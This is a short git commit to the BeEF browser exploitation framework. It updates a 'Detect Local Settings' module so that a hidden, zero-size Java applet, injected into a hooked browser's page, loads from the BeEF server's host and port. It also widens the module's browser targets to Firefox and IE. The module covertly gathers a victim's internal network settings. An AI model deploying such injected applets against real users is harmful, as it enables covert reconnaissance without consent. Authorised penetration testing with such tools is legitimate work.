Detect Local Settings Module: APPLET calls include domain/port. Updated target in the config

git-svn-id: https://beef.googlecode.com/svn/trunk@1238 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
xntrik
2011-08-28 05:20:21 +00:00
parent 7a4b07ef2e
commit 1bc314c446
2 changed files with 3 additions and 3 deletions

View File

@@ -24,7 +24,7 @@ beef.execute(function() {
}
} else {
//Trying to insert the Beeffeine applet
content = "<APPLET code='Beeffeine' codebase='/Beeffeine.class' width=0 height=0 id=beeffeine name=beeffeine></APPLET>";
content = "<APPLET code='Beeffeine' codebase='http://"+beef.net.host+":"+beef.net.port+"/Beeffeine.class' width=0 height=0 id=beeffeine name=beeffeine></APPLET>";
$j('body').append(content);
internal_counter = 0;
//We have to kick off a loop now, because the user has to accept the running of the applet perhaps

View File

@@ -22,6 +22,6 @@ beef:
description: "Grab the local network settings (ie internal ip address)."
authors: ["pdp", "wade", "bm", "xntrik"]
target:
working: "FF"
working: ["FF", "IE"]
user_notify: "C"
not_working: "IE"
not_working: "S"